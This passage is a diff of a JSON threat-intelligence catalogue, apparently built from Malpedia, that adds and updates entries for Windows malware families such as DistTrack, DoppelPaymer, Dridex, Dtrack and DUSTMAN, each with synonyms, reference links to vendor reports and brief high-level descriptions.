@@ -7076,20 +13593,65 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2017", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://securelist.com/shamoon-the-wiper-copycats-at-work/", + "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + 
"https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", + "https://malwareindepth.com/shamoon-2012/", + "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks" + ], + "synonyms": [ + "Shamoon" ], - "synonyms": [], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent", + "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/", + "https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf", + "https://blog.talosintelligence.com/2019/09/divergent-analysis.html", + "https://www.cert-pa.it/notizie/devergent-malware-fileless/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/" + ], + "synonyms": [ + "Novter" + ], + "type": [] + }, + "uuid": "7ca1e2ad-6cf4-44cc-8559-2f71e4fb2801", + "value": "Divergent" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun", + "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5e73185c-6070-45ed-88de-ed75580582eb", + "value": "Diztakun" + 
}, { "description": "", "meta": { 
@@ -7118,11 +13680,38 @@ "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "DMSniff" }, + { + "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c35d10d-b3da-459e-a272-da2ea7cee4c2", + "value": "DneSpy " + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger", + "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92db05a0-7d7e-40c3-94c8-ce3cd5e36daa", + "value": "DNSChanger" + }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. 
This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" @@ -7145,11 +13734,17 @@ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", + "https://marcoramilli.com/2019/04/23/apt34-webmask-project/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [ "Agent Drable", + "AgentDrable", "Webmask" ], "type": [] 
@@ -7172,14 +13767,71 @@ "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d713f337-b9c7-406d-88e4-3352b2523c73", + "value": "donut_injector" + }, + { + "description": "Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: \".how2decrypt.txt\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", + "https://techcrunch.com/2020/03/01/visser-breach/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + 
"https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.ic3.gov/Media/News/2020/201215-1.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", + "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/" + ], + "synonyms": [], + "type": [] + }, + "uuid": 
"16a76dcf-92cb-4371-8440-d6b3adbb081b", + "value": "DoppelPaymer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "https://research.checkpoint.com/dorkbot-an-investigation/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" ], "synonyms": [], "type": [] @@ -7192,7 +13844,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" ], "synonyms": [], "type": [] 
@@ -7200,14 +13853,44 @@ "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware", + "https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html" + ], + "synonyms": [ + "MZP Ransomware" + ], + "type": [] + }, + "uuid": "fc63c3ea-23ed-448d-9d66-3fb87ebea4ba", + "value": "Dot Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://twitter.com/Int2e_/status/1294565186939092994" + ], + "synonyms": [ + "VALIDATOR" + ], + "type": [] + }, + "uuid": "46a523ca-be25-4f59-bc01-2c006c58bf80", + "value": "DoubleFantasy (Windows)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", + "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], @@ -7222,6 +13905,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ 
@@ -7237,6 +13921,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], @@ -7246,10 +13931,11 @@ "value": "Downeks" }, { - "description": "", + "description": "DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download\r\nand run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], @@ -7258,6 +13944,23 @@ "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, + { + "description": "simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + ], + "synonyms": [ + "GAMEFISH" + ], + "type": [] + }, + "uuid": "61ac2821-9512-40c0-b41f-19dd2ea14c74", + "value": "Downrage" + }, { "description": "", "meta": { 
@@ -7270,13 +13973,32 @@ "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b", + "value": "DRATzarus" + }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122", + "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality", + "https://community.riskiq.com/article/30f22a00" ], "synonyms": [], "type": [] 
@@ -7290,15 +14012,61 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + 
"https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", + "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://viql.github.io/dridex/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", + "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/" ], "synonyms": [], "type": [] 
@@ -7311,6 +14079,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" @@ -7324,6 +14093,49 @@ "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", "value": "DRIFTPIN" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion", + "https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan" + ], + "synonyms": [ + "Masson" + ], + "type": [] + }, + "uuid": "a752676f-06c1-426c-9fcb-6c199afc74af", + "value": "Dripion" + }, + { + "description": "Communicates via Google Drive.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean", + "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + ], + "synonyms": [ + "Google Drive RAT" + ], + "type": [] + }, + "uuid": "730a4e94-4f9b-4f34-a1f3-1c97d341332c", + "value": "DriveOcean" + }, + { + "description": "DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8c142a72-0efb-4850-b684-bc6b5300f85e", + "value": "DropBook" + }, { "description": "", "meta": { 
@@ -7340,16 +14152,27 @@ "value": "DROPSHOT" }, { - "description": "", + "description": "Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. \r\nIts core functionality includes operations to upload a file to the victim's computer, download a file from the victim's computer, dump disk volume data, persistence and more.\r\n\r\nA variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", + "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [], "type": [] }, - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor" + "uuid": "414f95e1-aabe-4aa9-b9be-53e0826f62c1", + "value": "Dtrack" }, { "description": "", 
@@ -7370,7 +14193,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", + "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], @@ -7410,6 +14233,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], 
@@ -7418,27 +14244,72 @@ "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, + { + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", + "https://twitter.com/Irfan_Asrar/status/1213544175355908096", + "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/", + "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report", + "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "daa3d1e4-9265-4f1c-b1bd-9242ac570681", + "value": "DUSTMAN" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + 
